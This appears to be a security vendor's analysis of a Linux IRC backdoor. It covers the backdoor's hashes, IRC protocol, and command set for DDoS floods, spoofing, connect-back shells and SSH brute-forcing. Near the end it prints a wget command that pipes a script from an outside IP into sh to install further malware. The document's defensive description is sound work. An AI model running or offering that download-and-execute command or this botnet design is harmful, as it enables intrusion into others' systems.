SHA1:
- 3a99f7816c6864fd36ceea3380e591d337b0b241 (unpacked)
- 691704fb9de3e1d4a6c5b84b99be71ef375257a8 (packed)
Backdoor for Linux OSes that gets installed on the system by Linux.PNScan.1. It uses "/var/run/.boss.pid" as a lock file.
To connect to the IRC server, the Trojan generates the name and nickname string as follows:
m64|dog|root|%c%c%c%c%c%c%c%c%cwhere %c indicates a random number from the "0123456789" set.
If connection attempt is successful, the malicious program sends the following commands to the server:
NICK <nick>\n
USER x00 localhost localhost :dogscan\nwhere <nick> indicates a nickname generated as described above.
While establishing a connection to the IRC server, the malicious program waits for incoming commands. The backdoor can execute the following commands:
| Command | Action | Comments |
|---|---|---|
| 352 | Set a fake IP | |
| 376 | Join the channel | Send(fd, "MODE %s -xi\n", nick); Send(fd, "MODE %s +B\n", nick); Send(fd, "JOIN %s :%s\n", chan, pass); |
| 433 | Generate a new nickname | |
| ERROR | Generate a new nickname | |
| 422 | Join the channel | Send(fd, "MODE %s -xi\n", nick); Send(fd, "MODE %s +B\n", nick); Send(fd, "JOIN %s :%s\n", chan, pass); |
| NICK | Take a string from the command as a nickname | |
| PING | Send PONG | |
| PRIVMSG | Execute a special command |
Moreover, the Trojan can execute a number of extended commands.
| Command | Action | Syntax |
|---|---|---|
| RANDOMFLOOD | Randomly switch between ACK and SYN Flood | RANDOMFLOOD <target> <port> <secs> |
| NSACKFLOOD | ACK Flood | NSACKFLOOD <target> <port> <secs> |
| NSSYNFLOOD | SYN Flood | NSSYNFLOOD <target> <port> <secs> |
| ACKFLOOD | ACK Flood (spoofed) | |
| SYNFLOOD | SYN Flood (spoofed) | SYNFLOOD <target> <port> <secs> |
| UDP | UDP Flood | UDP <target> <port> <secs> |
| UNKNOWN | Launch a DDoS attack | UNKNOWN <target> <secs> |
| SERVER | Change the server to the one specified in the command | |
| GETSPOOFS | Get spoofing parameters | |
| SPOOFS | Set an IP or an IP range for spoofing | SPOOFS <iprange/ip> |
| GET | Download a specified file | GET <url> <save as> |
| VERSION | Return backdoor's version | |
| KILLALL | Terminate a DDoS attack | |
| HELP | Display the list of available commands | |
| CBACK | Connect back | CBACK <ip> <port> connectback shell |
| SCANRND | Brute-force SSH credentials (random IP addresses are chosen from an IP range, and a standard dictionary is used) | SCANRND <192 or 192.168 or 192.168.0> <threads> <minutes> |
| SCANRND2 | Brute-force SSH credentials (random IP addresses are chosen from an IP range, and a dictionary specified in the incoming parameters is used) | SCANRND2 <192 or 192.168 or 192.168.0> <threads> <minutes> <user> <passwd> |
| SCANSUB | Brute-force SSH credentials (the Trojan goes through all IP addresses from an IP range using a standard dictionary) | SCANSUB <192.168> <threads> |
| SCANSUB2 | Brute-force SSH credentials (the Trojan goes through all IP addresses from an IP range using a dictionary specified in the incoming parameters) | SCANSUB2 <192.168> <threads> <user> <passwd> |
| DOGRND | Brute-force SSH credentials (random IP addresses are chosen from an IP range, and a standard dictionary is used) | DOGRND <192 or 192.168 or 192.168.0> <threads> <minutes> |
| DOGSUB | Brute-force SSH credentials (the Trojan goes through all IP addresses from an IP range using a standard dictionary) | DOGSUB <192.168> <threads> |
| IRC | Send specified IRC commands to the server | IRC <arg1> <arg2> <arg...> |
| SH | Execute a set of SH commands | SH <arg1> <arg2> <arg...> |
Once the login:password combination is found, SCANRND, SCANRND2, SCANSUB, SCANSUB2 execute the following command on the remote system:
wget -qO - http://104.199.135.124/bbsh | sh > /dev/null 2>↦1or
wget -qO - http://104.199.135.124/wgsh | sh > /dev/null 2>↦1 Downloaded scripts install Linux.BackDoor.Tsunami.144 on the system.
Once the login:password combination is found, DOGRND, DOGSUB execute the following command:
uname -a || echo - After that, the "##scaninfo##" user receives the following information in the IRC chat:
[g+] <login>@<ip> | <password> | <os> \n